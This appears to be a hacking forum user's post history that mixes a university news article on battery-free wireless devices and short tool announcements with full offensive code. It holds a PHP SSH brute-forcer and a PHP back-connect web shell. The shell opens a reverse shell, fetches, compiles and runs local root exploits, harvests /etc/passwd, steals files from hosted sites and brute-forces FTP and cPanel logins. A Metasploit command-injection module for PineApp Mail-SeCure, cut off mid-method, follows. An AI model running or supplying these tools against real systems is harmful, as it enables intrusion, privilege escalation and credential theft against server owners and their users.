-
Posts
3206 -
Joined
-
Days Won
87
Everything posted by Fi8sVrs
-
We might be one step closer to an Internet-of-things reality. University of Washington engineers have created a new wireless communication system that allows devices to interact with each other without relying on batteries or wires for power. Two devices communicate without using battery power. University of Washington Using ambient backscatter, these devices can interact with users and communicate with each other without using batteries. They exchange information by reflecting or absorbing pre-existing radio signals. The new communication technique, which the researchers call “ambient backscatter,” takes advantage of the TV and cellular transmissions that already surround us around the clock. Two devices communicate with each other by reflecting the existing signals to exchange information. The researchers built small, battery-free devices with antennas that can detect, harness and reflect a TV signal, which then is picked up by other similar devices. The technology could enable a network of devices and sensors to communicate with no power source or human attention needed. “We can repurpose wireless signals that are already around us into both a source of power and a communication medium,” said lead researcher Shyam Gollakota, a UW assistant professor of computer science and engineering. “It’s hopefully going to have applications in a number of areas including wearable computing, smart homes and self-sustaining sensor networks.” The researchers published their results at the Association for Computing Machinery’s Special Interest Group on Data Communication 2013 conference in Hong Kong, which began Aug. 13. They have received the conference’s best-paper award for their research. “Our devices form a network out of thin air,” said co-author Joshua Smith, a UW associate professor of computer science and engineering and of electrical engineering. “You can reflect these signals slightly to create a Morse code of communication between battery-free devices.” University of Washington Everyday objects could be enabled with battery-free tags to communicate with each other. A couch could use ambient backscatter to let the user know where his keys were left. Smart sensors could be built and placed permanently inside nearly any structure, then set to communicate with each other. For example, sensors placed in a bridge could monitor the health of the concrete and steel, then send an alert if one of the sensors picks up a hairline crack. The technology can also be used for communication – text messages and emails, for example – in wearable devices, without requiring battery consumption. The researchers tested the ambient backscatter technique with credit card-sized prototype devices placed within several feet of each other. For each device the researchers built antennas into ordinary circuit boards that flash an LED light when receiving a communication signal from another device. Groups of the devices were tested in a variety of settings in the Seattle area, including inside an apartment building, on a street corner and on the top level of a parking garage. These locations ranged from less than half a mile away from a TV tower to about 6.5 miles away. Researchers demonstrate how one payment card can transfer funds to another card by leveraging the existing wireless signals around them. Ambient RF signals are both the power source and the communication medium. They found that the devices were able to communicate with each other, even the ones farthest from a TV tower. The receiving devices picked up a signal from their transmitting counterparts at a rate of 1 kilobit per second when up to 2.5 feet apart outdoors and 1.5 feet apart indoors. This is enough to send information such as a sensor reading, text messages and contact information. It’s also feasible to build this technology into devices that do rely on batteries, such as smartphones. It could be configured so that when the battery dies, the phone could still send text messages by leveraging power from an ambient TV signal. The applications are endless, the researchers say, and they plan to continue advancing the capacity and range of the ambient backscatter communication network. The other researchers involved are David Wetherall, a UW professor of computer science and engineering, Vincent Liu, a doctoral student in computer science and engineering, and Aaron Parks and Vamsi Talla, both doctoral students in electrical engineering. The research was funded by the University of Washington through a Google Faculty Research Award and by the National Science Foundation’s Research Center for Sensorimotor Neural Engineering at the UW. ### For more information, contact Gollakota and Smith at abc@cs.washington.edu or 206-685-2094. Via: Wireless devices go battery-free with new communication technique | UW Today
-
- 1
-
update: Nmap NSE Vulscan 2.0 Download: Nmap NSE Vulscan 2.0 ? Packet Storm Changes: Added version identification support, which may improve the accuracy of findings as long as the linked vulnerability databases provide version information. Squashed a parsing bug if the server response did contain a special character. This caused the script to fail under some circumstances.
-
or this: http://sourceforge.net/apps/mediawiki/watobo/index.php?title=QuickStartGuide
-
Emmet LiveStyle is a plugin for live bi-directional (editor?browser) CSS editing of new generation. Currently, it works in Google Chrome, Safari and Sublime Text, more browsers and editors will be available later. This video demonstrates the most powerful features of LiveStyle. LiveStyle features Instant updates: see changes as-you-type. No file saving, no page reloading. No local files required. Cross-platform Multi-view and multi-device updates. You can open the same page in different windows and get instant updates in all of them. If your monitor large enough, you can easily tweak responsive design as never before! And yes, changes made in DevTools of one window will be automatically applied to other ones. Multi-site update. You can even live edit different web-sites, for example, desktop and mobile versions of you web-site that shares the same CSS code base. Extremely easy setup: just open CSS file in editor and associate it with the browser one in LiveStyle browser pane. No complex mappings, patterns etc. Install Emmet LiveStyle — live bi-directional CSS edit of new generation
-
@@ 'ssh2_connect' and 'pcntl_fork' functions must be installed on your machine (BackTrack5 Recommended)
- 3 replies
-
- brute force
- php
-
(and 1 more)
Tagged with:
-
SSH brute-forcer tool written in PHP. about: * SSH Brute-Forcer * Written by Miyachung * Homepage : http://janissaries.org * Youtube Channel: http://www.youtube.com/janissariesorg * @@ 'ssh2_connect' and 'pcntl_fork' functions must be installed on your machine (BackTrack5 Recommended) * @@ This tool is using process forking system * All rights reserved * Contact with coder: miyachung@hotmail.com or jabber.org usage: <?php/* .__ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\ | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/ * SSH Brute-Forcer * Written by Miyachung * Homepage : http://janissaries.org * Youtube Channel: http://www.youtube.com/janissariesorg * Usage : * @@ 'ssh2_connect' and 'pcntl_fork' functions must be installed on your machine (BackTrack5 Recommended) * @@ This tool is using process forking system * All rights reserved * Contact with coder: miyachung@hotmail.com or jabber.org */ error_reporting(0); /* * Call the class */ $SSH = new SSHBruter(); /* * Does control if 'ssh2_connect' and 'pcntl_fork' functions not installed * if 'ssh2_connect' or 'pcntl_fork' functions not installed you can't use this brute-forcer tool */ if(!function_exists("ssh2_connect")) { $SSH->showErrorMsg(1); } elseif(!function_exists("pcntl_fork")) { $SSH->showErrorMsg(2); } /* * Parse arguments * There is 3 way to brute * Single : -h <host> -u <user> -w <wordlist> -o <output> -t <thread> * Combolist : -c <combolist> -o <output> -t <thread> * Multiple : -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread> */ $options_single = getopt("h:u:w:o:t:"); $options_combo = getopt("c:o:t:"); $options_multi = getopt("f:u:w:o:t:"); /* * Does arguments control! */ if($options_single) { if($options_single["h"] != null && $options_single["u"] != null && $options_single["w"] != null && $options_single["o"] != null && $options_single["t"] != null) { $SSH->SingleBrute( $options_single["h"] , $options_single["u"] , $options_single["w"] , $options_single["o"] , $options_single["t"] ); } else{ $SSH->showErrorMsg(3); } } elseif($options_combo) { if($options_combo["c"] != null && $options_combo["o"] != null && $options_combo["t"] != null) { $SSH->ComboBrute( $options_combo["c"] , $options_combo["o"] , $options_combo["t"] ); } else{ $SSH->showErrorMsg(3); } } elseif($options_multi) { if($options_multi["f"] != null && $options_multi["u"] != null & $options_multi["w"] != null && $options_multi["o"] != null && $options_multi["t"] != null) { $SSH->MultiBrute( $options_multi["f"] , $options_multi["u"] , $options_multi["w"] , $options_multi["o"] , $options_multi["t"] ); } else{ $SSH->showErrorMsg(3); } } else { $SSH->showErrorMsg(3); } class SSHBruter { /* * Prints 'MAIN_MESSAGE' if arguments used wrong */ const MAIN_MESSAGE = "\n*********************************************\n* SSH Brute-Forcer Single or Multiple\n* Written by Miyachung\n* Homepage : http://janissaries.org\n********************************* ************\n"; /* * Prints 'NOT_INSTALLED_SSH' if ssh2_connect function not found */ const NOT_INSTALLED_SSH = "Oops! 'ssh2_connect' function isn't exists you can't use this tool on this machine\n\n"; /* * Prints 'NOT_INSTALLED_PCNTL' if pcntl_fork function not found */ const NOT_INSTALLED_PCNTL= "Oops! 'pcntl_fork' function isn't exists you can't use this tool on this machine\n\n"; /* * Prints 'ARGMISS' if arguments not specified */ const ARGMISS = "[!]Wrong Usage!\nphp SSHBruter.php -h <host> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -c <combolist> -o <output> -t <thread>\n\n"; /* * Counts hosts & passwords , increments in foreach loop */ private $counter = 0; /* * Performs brute force to specified single host arguments -h <host> -u <user> -w <wordlist> -o <output> -t <thread> */ function SingleBrute( $host , $user, $wordlist, $output , $thread ) { echo "\n"; echo "Host: ".$host."\n"; echo "User: ".$user."\n\n"; $chunk_wordlist = array_chunk( file($wordlist) , $thread ); foreach($chunk_wordlist as $passwords) { foreach($passwords as $password) { $this->counter++; $fork = pcntl_fork(); if(!$fork) { $perform_single = $this->SSH( $host , $user , trim($password) , $output ); if($perform_single) { print "Sleeping 120 seconds , PRESS CTRL + C NOW!"; sleep(120); } exit; } } $this->waitForThreadFinish(); } } /* * Performs brute force to specified combo list arguments -c <combolist> -o <output> -t <thread> */ function ComboBrute( $combolist , $output , $thread ) { $chunk_combolist = array_chunk( file($combolist) , $thread); foreach($chunk_combolist as $combo) { foreach($combo as $hostuserpwd) { $this->counter++; list($host,$user,$password) = split(":",trim($hostuserpwd)); $fork = pcntl_fork(); if(!$fork) { $this->SSH( $host , $user , $password , $output ); exit; } } $this->waitForThreadFinish(); } } /* * Performs brute force to specified host list arguments -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread> */ function MultiBrute( $hostlist , $user , $wordlist , $output , $thread ) { foreach(file($hostlist) as $host) { $chunk_wordlist = array_chunk( file($wordlist) , $thread ); foreach($chunk_wordlist as $passwords) { foreach($passwords as $password) { $this->counter++; $fork = pcntl_fork(); if(!$fork) { $this->SSH( trim($host) , $user , trim($password) , $output ); exit; } } $this->waitForThreadFinish(); } } } /* * Performs login to host with specified user and password(s) */ function SSH( $host , $user , $password , $output , $port = 22 ) { $connect = ssh2_connect( $host , $port ); if(!$connect) { print "[".$this->counter."] Host: ".$host." Connection Failed\n"; flush(); break; } else { $auth = ssh2_auth_password( $connect , $user , $password ); if($auth) { $a = "*********************************************\n"; $a.= "[+] Found!\n"; $a.= "[+] Host: ".$host."\n"; $a.= "[+] User: ".$user."\n"; $a.= "[+] Password: ".$password."\n"; print $a."[!] If You Want To Stop Brute Press CTRL + C Now!\n******************************************** *\n"; self::SaveResult( $output , $a ); return true; } else { print "[".$this->counter."] Trying Host: ".$host." Username: ".$user." Password: ".$password."\n"; flush(); break; } } } /* * All error messages showing from there */ function showErrorMsg( $errno ) { print self::MAIN_MESSAGE; if($errno == 1) { print self::NOT_INSTALLED_SSH; exit; } if($errno == 2) { print self::NOT_INSTALLED_PCNTL; exit; } if($errno == 3) { print self::ARGMISS; exit; } } /* * Waits for threads to finish */ function waitForThreadFinish() { while (pcntl_waitpid(0, $status) != -1) { $status = pcntl_wexitstatus($status); } } /* * Saves everything with this function */ static function SaveResult( $output,$text ) { $open_file = fopen( $output , "a" ); fwrite( $open_file , $text ); fclose( $open_file ); } } # miyachung represents / janissaries.org group ?>
- 3 replies
-
- brute force
- php
-
(and 1 more)
Tagged with:
-
This is a PHP shell that provides the ability to connect back, grab files, perform exploit searches for local roots and compile and run them, and much more. Written by Miyachung . Janissaries.Org . Contact: miyachung@hotmail Video: <?php/* ================================================== ================= .__ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\ | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/ ================================================== ================= . Miyachung BackConnect Shell . Written by Miyachung . Janissaries.Org . Contact: miyachung@hotmail . Video : Commands works with shell_exec() function @ Options - exploit = Automatic Search & Download & Run a local root exploit which matches with kernel release - grabusr = Grab users from /etc/passwd and save into a file ( users ) - domains = List domains from /var/named - getf = Find and grab the name given file from all public_html dirs ( only works with /home/USER/public_html servers ) - catln = Cat file with ln -s method - index = Try copy the name given file to all public_html dirs ( only works with /home/USER/public_html servers ) - home = Change dir into home folder - ftp = Performs ftp brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers ) - cpanel = Performs cpanel brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers ) */ ob_start(); $server_ip = $_SERVER['SERVER_ADDR']; $your_ip = getenv('REMOTE_ADDR'); $your_port = 443; $timeout = 5; if(!empty($server_ip) && !empty($your_ip) && !empty($your_port) && !empty($timeout)) { $create = new BC($your_ip,$your_port,$server_ip,$timeout); } /* @ Connection Class */ class BC { private $your_ip; private $your_port; private $server_ip; private $timeout; private $homefolder; public function __construct($yip,$yp,$sip,$t) { $this->your_ip = $yip; $this->your_port = $yp; $this->server_ip = $sip; $this->timeout = $t; print("<title>Miyachung BackConnect Shell</title>"); print("<strong>Miyachung BackConnect Shell</strong>\n<br>"); print("Your ip is <strong>$this->your_ip</strong>\n<br>"); print("Your port is <strong>$this->your_port</strong>\n<br>"); print("Server ip is <strong>$this->server_ip</strong>\n<br>"); print("Timeout seconds <strong>$this->timeout</strong>\n\n<br><br>"); print("Trying to create shell process <strong>$this->your_ip</strong> with <strong>$this->your_port</strong> on <strong>$this->server_ip</strong>\n<br>"); ob_flush(); flush(); $this->createshell(); } private function createshell() { $socket = @fsockopen($this->your_ip,$this->your_port,$errno,$errstr,$this->timeout) or die("<font color='red'>Unfortunately could not spawn shell</font>\n<br>"); print("<font color='green'>Shell process opened to <strong>$this->server_ip</strong> > <strong>$this->your_ip:$this->your_port</strong></font>\n<br>"); ob_flush(); flush(); fwrite($socket,"================================================== ==========="); fwrite($socket," .__ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\ | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/ "); fwrite($socket,"Welcome to the BackConnect Shell !!\n"); fwrite($socket,"Written by Miyachung\n"); fwrite($socket,"Informations\n"); fwrite($socket,"------------------------------------------------\n"); fwrite($socket,"uname -a: ".@shell_exec("uname -a")); fwrite($socket,"whoami: ".@shell_exec("whoami")); fwrite($socket,"id: ".@shell_exec("id")); fwrite($socket,"pwd: ".@shell_exec("pwd")); fwrite($socket,"@ Options\n\n"); fwrite($socket,"- exploit = Automatic Search & Download & Run a local root exploit which matches with kernel release\n"); fwrite($socket,"- grabusr = Grab users from /etc/passwd and save into a file ( users )\n"); fwrite($socket,"- domains = List domains from /var/named\n"); fwrite($socket,"- getf = Find and grab the name given file from all public_html dirs ( only works with /home/USER/public_html servers )\n"); fwrite($socket,"- catln = Cat file with ln -s method\n"); fwrite($socket,"- index = Try copy the name given file to all public_html dirs ( only works with /home/USER/public_html servers )\n"); fwrite($socket,"- home = Change dir into home folder\n"); fwrite($socket,"- ftp = Performs ftp brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers )\n"); fwrite($socket,"- cpanel = Performs cpanel brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers )\n"); $this->homefolder = trim(@shell_exec("pwd")); fwrite($socket,"================================================== ===========\n"); $result= @shell_exec("whoami"); fwrite($socket,$result); print "<font color='green'>Command whoami;</font>\n"; print $result; ob_flush(); flush(); preg_match("#([0-9]).([0-9]).([0-9]+)-([a-z0-9]+)#si",@shell_exec("uname -r"),$version); $version1 = $version[0]; $version2 = $version[1].".".$version[2].".".$version[3]; print "<pre>"; while(1) { $enter = fgets($socket); if(preg_match('#exit#',$enter)){fwrite($socket,"Process closed\n");exit("Process closed");} if(preg_match('#exploit#',$enter)){$this->search($version1,$socket);$this->search($version2,$socket);} if(preg_match('#grabusr#',$enter)){$this->grab_users($socket);} if(preg_match('#catln (.+)#',$enter,$file)){$this->catln($file[1],$socket);} if(preg_match('#index (.+)#',$enter,$file)){$this->index($file[1],$socket);} if(preg_match('#getf (.+)#',$enter,$file)){$this->getf($file[1],$socket);} if(preg_match('#ftp (.+)#',$enter,$file)){$this->ftp($file[1],$socket);} if(preg_match('#cpanel (.+)#',$enter,$file)){$this->cpanel($file[1],$socket);} if(preg_match('#domains#',$enter)){$this->domains($socket);} if(eregi('home',$enter)){chdir($this->homefolder);} if(strpos($enter,'cd ..')){ $curr = getcwd(); $explode = explode("/",$curr); $c = count($explode); unset($explode[$c-1]); $explode = array_values(array_filter($explode)); $path = implode("/",$explode); $path = "/".$path; if(!chdir($path)){fwrite($socket,"Can't chdir into $path : Permission denied\n");} } elseif(preg_match('#cd (.+)#',$enter,$dir)){ $curr = getcwd(); if(preg_match("#\/#si",$dir[1])) { if(!chdir($dir[1])){fwrite($socket,"Can't chdir into $dir[1] : Permission denied\n");} } else { if(!chdir($curr."/".$dir[1])){fwrite($socket,"Can't chdir into $curr/$dir[1] : Permission denied\n");} } } $result= @shell_exec(trim($enter)); fwrite($socket,$result); print "<font color='green'>Command ".trim($enter).";</font>\n"; print $result; ob_flush(); flush(); } print "</pre>"; fclose($socket); } private function search($version,$socket) { fwrite($socket,"Release: $version\n"); print("Release: $version\n<br>"); ob_flush();flush(); fwrite($socket,"Searching Exploit-DB for local root exploits..\n"); print("Searching Exploit-DB for local root exploits..\n<br>"); $exploit_db = $this->curl("http://www.exploit-db.com/search/?action=search&filter_description=$version"); if(preg_match('/No results/si',$exploit_db)) { fwrite($socket,"Not found any exploits\n"); print("Not found any exploits\n<br>"); ob_flush();flush(); } else { fwrite($socket,"==================== Possible Exploits =====================\n"); print("==================== Possible Exploits =====================\n<br>"); ob_flush();flush(); preg_match_all('#<td class="list_explot_description">(.*?)<\/td>#si',$exploit_db,$list); foreach($list[1] as $listx) { preg_match('#<a href="(.*?)">(.*?)<\/a>#si',$listx,$exploit); fwrite($socket,"[+] ".$exploit[2]."\n"); print("[+] ".$exploit[2]."\n<br>"); fwrite($socket,"Trying pwn this server with this exploit\n"); print("Trying pwn this server with this exploit\n<br>"); fwrite($socket,"Downloading => ".$exploit[1]."\n"); print("Downloading => ".$exploit[1]."\n<br>"); ob_flush();flush(); $download = $this->download($exploit[1]); if($download != false) { fwrite($socket,"File downloaded saved as $download\n"); print("File downloaded saved as $download\n<br>"); fwrite($socket,"Trying compile to $download file\n"); print("Trying compile to $download file\n<br>"); ob_flush();flush(); $withoutc = str_replace(".c","",$download); @shell_exec("gcc $download -o $withoutc"); if(file_exists($withoutc)) { fwrite($socket,"File compiled\n"); print("File compiled\n<br>"); fwrite($socket,"Setting chmod options\n"); print("Setting chmod options\n<br>"); @shell_exec("chmod +x $withoutc"); fwrite($socket,"Running exploit..!\n"); print("Running exploit..!\n<br>"); ob_flush();flush(); @shell_exec("./$withoutc"); } else { fwrite($socket,"File doesn't compile\n"); print("File doesn't compile\n<br>"); ob_flush();flush(); } } else { fwrite($socket,"File doesn't download\n"); print("File doesn't download\n<br>"); ob_flush();flush(); } } fwrite($socket,"==================== Possible Exploits =====================\n"); print("==================== Possible Exploits =====================\n<br>"); ob_flush();flush(); } fwrite($socket,"Searching 1337day for local root exploits..\n"); print("Searching 1337day for local root exploits..\n<br>"); ob_flush();flush(); $day1337 = $this->curl("http://www.1337day.com/search","agree=Ok&dong=$version&submit_search=Submit"); preg_match_all("#<a href='/exploit/description/(.*?)' >(.*?)<\/a>#si",$day1337,$exploits); if($exploits[1]) { fwrite($socket,"==================== Possible Exploits =====================\n"); print("==================== Possible Exploits =====================\n<br>"); ob_flush();flush(); foreach($exploits[1] as $i => $exploit) { fwrite($socket,"[+] ".$exploits[2][$i]."\n"); print("[+] ".$exploits[2][$i]."\n<br>"); fwrite($socket,"Trying pwn this server with this exploit\n"); print("Trying pwn this server with this exploit\n<br>"); $exploit_link = "http://www.1337day.com/exploit/$exploit"; fwrite($socket,"Downloading => ".$exploit_link."\n"); print("Downloading => ".$exploit_link."\n<br>"); ob_flush();flush(); $download = $this->day1337download($exploit_link); if($download != false) { fwrite($socket,"File downloaded saved as $download\n"); print("File downloaded saved as $download\n<br>"); fwrite($socket,"Trying compile to $download file\n"); print("Trying compile to $download file\n<br>"); ob_flush();flush(); $withoutc = str_replace(".c","",$download); @shell_exec("gcc $download -o $withoutc"); if(file_exists($withoutc)) { fwrite($socket,"File compiled\n"); print("File compiled\n<br>"); fwrite($socket,"Setting chmod options\n"); print("Setting chmod options\n<br>"); @shell_exec("chmod +x $withoutc"); fwrite($socket,"Running exploit..!\n"); print("Running exploit..!\n<br>"); ob_flush();flush(); @shell_exec("./$withoutc"); } else { fwrite($socket,"File doesn't compile\n"); print("File doesn't compile\n<br>"); ob_flush();flush(); } } } fwrite($socket,"==================== Possible Exploits =====================\n"); print("==================== Possible Exploits =====================\n<br>"); ob_flush();flush(); } else { fwrite($socket,"Not found any exploits\n"); print("Not found any exploits\n<br>"); ob_flush();flush(); } } private function curl($site,$post=null) { $ch = curl_init(); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_URL,$site); if($post != null) { curl_setopt($ch,CURLOPT_POSTFIELDS,$post); } $exec = curl_exec($ch); curl_close($ch); return $exec; } private function download($url) { preg_match('#\/exploits\/(.+)#si',$url,$filename); $filename = $filename[1].".c"; $url = str_replace("exploits","download",$url); $openurl = @file_get_contents($url); if($openurl && file_put_contents($filename,$openurl)){ return $filename; } else { return false; } } private function day1337download($url) { preg_match('#\/exploit\/(.+)#si',$url,$filename); $filename = $filename[1].".c"; $data = $this->curl($url,"agree=Ok"); preg_match("#<pre class='brush: plain; tab-size: 8'>(.*?)<\/pre>#si",$data,$content); if(file_put_contents($filename,$content)) { return $filename; } else { return false; } } private function grab_users($socket) { $read = file("/etc/passwd"); $x0x = ""; foreach($read as $text) { $text = trim($text); $user = explode(":",$text); $user = $user[0]; $xox .= $user."\r\n"; fwrite($socket,$user."\n"); print($user."\n"); } fwrite($socket,"Grabbed ".count($read)." users from /etc/passwd\n"); print("Grabbed ".count($read)." users from /etc/passwd\n"); $save = $this->save_as("users",$xox,"wb"); if($save){fwrite($socket,"Saved into file as 'users'\n");print("Saved into file as 'users'\n");}else{fwrite($socket,"Doesn't save into file\n");print("Doesn't save into file\n");} } private function catln($file,$socket) { $savefile = uniqid(); @shell_exec("ln -s $file ".$savefile); if(file_exists($savefile)) { fwrite($socket,file_get_contents($savefile)); print(file_get_contents($savefile)); fwrite($socket,"File name $savefile\n"); print("File name $savefile\n"); } else { fwrite($socket,"File doesn't read\n"); print("File doesn't read\n"); } } private function index($file,$socket) { $etc = file('/etc/passwd'); $count= 0; foreach($etc as $txt) { $txt = trim($txt); $user= explode(":",$txt); $user= $user[0]; $path= "/home/$user/public_html/$file"; @shell_exec("cp $file $path"); if(file_exists($path)) { fwrite($socket,"File created: ".$path."\n"); print("File created: ".$path."\n"); $count++; } } fwrite($socket,"Completed\n"); print("Completed\n"); fwrite($socket,"File copied into $count dirs\n"); print("File copied into $count dirs\n"); } private function getf($file,$socket) { $etc = file('/etc/passwd'); $count = 0; foreach($etc as $txt) { $txt = trim($txt); $user= explode(":",$txt); $user= $user[0]; $path= "/home/$user/public_html/$file"; if(file_exists($path)) { fwrite($socket,"File found: ".$path."\n"); print("File found: ".$path."\n"); $content = file_get_contents($path); if($content) { $save = $this->save_as($user."-".$file,$content); if($save){ fwrite($socket,"File is readable,saved into file named $user-$file\n"); print("File is readable,saved into file named $user-$file\n"); $count++; } else { fwrite($socket,"File is readable but current dir is not writable\n"); print("File is readable but current dir is not writable\n"); } } else { @shell_exec("ln -s $path $user-$file"); if(file_exists($user[0]."-".$file)){ fwrite($socket,"File is read with ln -s method,saved into file named $user-$file\n"); print("File is read with ln -s method,saved into file named $user-$file\n"); $count++; } else { fwrite($socket,"File is not readable\n"); print("File is not readable\n"); } } } } fwrite($socket,"Grabbed $count files\n"); print("Grabbed $count files\n"); } private function domains($socket) { $x0x = ""; $c = 0; $path = "/var/named"; $dir_handle = @opendir($path); if($dir_handle) { while ($file = readdir($dir_handle)) { if (!is_dir($path."/".$file) AND ($file != "..") AND ($file != ".")) { $dosya = str_replace(".db","",$file); fwrite($socket,$dosya."\n"); print($dosya."\n"); $x0x .= $dosya."\r\n"; $c++; } } $save = $this->save_as("d0mains",$x0x,"wb"); if($save == false){fwrite($socket,"Got domains but can't save into a file this dir is not writable\n");print("Got domains but can't save into a file this dir is not writable\n");} else { fwrite($socket,"Grabbed $c domains\n"); print("Grabbed $c domains\n"); fwrite($socket,"Saved into 'd0mains'\n"); print("Saved into 'd0mains'\n"); } closedir($dir_handle); } else { fwrite($socket,"Doesn't read /var/named\n"); print("Doesn't read /var/named\n"); } } private function ftp($wordlist,$socket) { fwrite($socket,"Starting ftp crack..\n"); ob_flush();flush(); $open = file($wordlist); $userx= array(); foreach($open as $pwd) { $pwd = trim($pwd); fwrite($socket,"Password ".$pwd." trying on all users\n"); ob_flush();flush(); $users= file('/etc/passwd'); foreach($users as $user) { $user = trim($user); $user = explode(":",$user); $user = $user[0]; $userx[] = $user; } $userx = array_filter($userx); $userx = array_unique($userx); $userx = array_chunk($userx,25); $multi = curl_multi_init(); foreach($userx as $u) { for($i=0;$i<=count($u)-1;$i++) { $curl[$i] = curl_init(); curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1); curl_setopt($curl[$i],CURLOPT_URL,"ftp://".$this->server_ip); curl_setopt($curl[$i],CURLOPT_USERPWD,trim($u[$i]).":".$pwd); curl_setopt($curl[$i],CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl[$i],CURLOPT_TIMEOUT,4); curl_multi_add_handle($multi,$curl[$i]); } do { curl_multi_exec($multi,$active); usleep(1); }while($active>0); foreach($curl as $cid => $cend) { $data[$cid] = curl_multi_getcontent($cend); if(preg_match('#drw#si',$data[$cid])) { fwrite($socket,"Found username: $u[$cid] , password: $pwd\n"); print("<font color='red'>Found username: $u[$cid] , password: $pwd</font>\n"); $save = $this->save_as("ftps.txt","Found username: $u[$cid] , password: $pwd\r\n","ab"); ob_flush();flush(); } else { fwrite($socket,"Not found $u[$cid]:$pwd\n"); print("Not found $u[$cid]:$pwd\n"); ob_flush();flush(); } curl_multi_remove_handle($multi,$cend); } } } } private function cpanel($wordlist,$socket) { fwrite($socket,"Starting cpanel crack..\n"); ob_flush();flush(); $open = file($wordlist); $userx= array(); foreach($open as $pwd) { $pwd = trim($pwd); fwrite($socket,"Password ".$pwd." trying on all users\n"); ob_flush();flush(); $users= file('/etc/passwd'); foreach($users as $user) { $user = trim($user); $user = explode(":",$user); $user = $user[0]; $userx[] = $user; } $userx = array_filter($userx); $userx = array_unique($userx); $userx = array_chunk($userx,25); $multi = curl_multi_init(); foreach($userx as $u) { for($i=0;$i<=count($u)-1;$i++) { $curl[$i] = curl_init(); curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1); curl_setopt($curl[$i],CURLOPT_URL,"https://$this->server_ip:2083/login/?login_only=1"); curl_setopt($curl[$i],CURLOPT_POSTFIELDS,"user=".trim($u[$i])."&pass=$pwd"); curl_setopt($curl[$i],CURLOPT_SSL_VERIFYPEER,0); curl_setopt($curl[$i],CURLOPT_SSL_VERIFYHOST,0); curl_setopt($curl[$i],CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl[$i],CURLOPT_TIMEOUT,4); curl_multi_add_handle($multi,$curl[$i]); } do { curl_multi_exec($multi,$active); usleep(1); }while($active>0); foreach($curl as $cid => $cend) { $data[$cid] = curl_getinfo($cend); if($data[$cid]['http_code'] != 401) { fwrite($socket,"Found username: $u[$cid] , password: $pwd\n"); print("<font color='red'>Found username: $u[$cid] , password: $pwd</font>\n"); $save = $this->save_as("cpanels.txt","Found username: $u[$cid] , password: $pwd\r\n","ab"); ob_flush();flush(); } else { fwrite($socket,"Not found $u[$cid]:$pwd\n"); print("Not found $u[$cid]:$pwd\n"); ob_flush();flush(); } curl_multi_remove_handle($multi,$cend); } } } } private function save_as($filename,$content,$type='ab') { $fopen = fopen($filename,$type); if($fopen) { fwrite($fopen,$content); fclose($fopen); return true; } else { return false; } } } ?>
-
da, Intercepter-NG ai si tutoriale
-
This Metasploit module exploits a command injection vulnerability on PineApp Mail-SeCure 3.70. The vulnerability exists on the test_li_connection.php component, due to the insecure usage of the system() php function. This Metasploit module has been tested successfully on PineApp Mail-SeCure 3.70. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution', 'Description' => %q{ This module exploits a command injection vulnerability on PineApp Mail-SeCure 3.70. The vulnerability exists on the test_li_connection.php component, due to the insecure usage of the system() php function. This module has been tested successfully on PineApp Mail-SeCure 3.70. }, 'Author' => [ 'Dave Weinstein', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-188/'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl python telnet' } }, 'Targets' => [ [ 'PineApp Mail-SeCure 3.70', { }] ], 'DefaultOptions' => { 'SSL' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 26 2013' )) register_options( [ Opt::RPORT(7443) ], self.class ) end def my_uri return normalize_uri("/admin/test_li_connection.php") end def get_cookies res = send_request_cgi({ 'uri' => my_uri, 'vars_get' => { 'actiontest' =>'1', # must be 1 in order to start the session 'idtest' => rand_text_alpha(5 + rand(3)), 'iptest' => "127.0.0.1" # In order to make things as fast as possible } }) if res and res.code == 200 and res.headers.include?('Set-Cookie') and res.headers['Set-Cookie'] =~ /SESSIONID/ return res.get_cookies else return nil end end def check # Since atm of writing this exploit there isn't patch available, # checking for the vulnerable component should be a reliable test. cookies = get_cookies if cookies.nil? return Exploit::CheckCode::Safe end return Exploit::CheckCode::Appears end def exploit print_status("#{rhost}:#{rport} - Retrieving session cookie...") cookies = get_cookies if cookies.nil? fail_with(Exploit::Failure::Unknown, "Failed to retrieve the session cookie") end print_status("#{rhost}:#{rport} - Executing payload...") 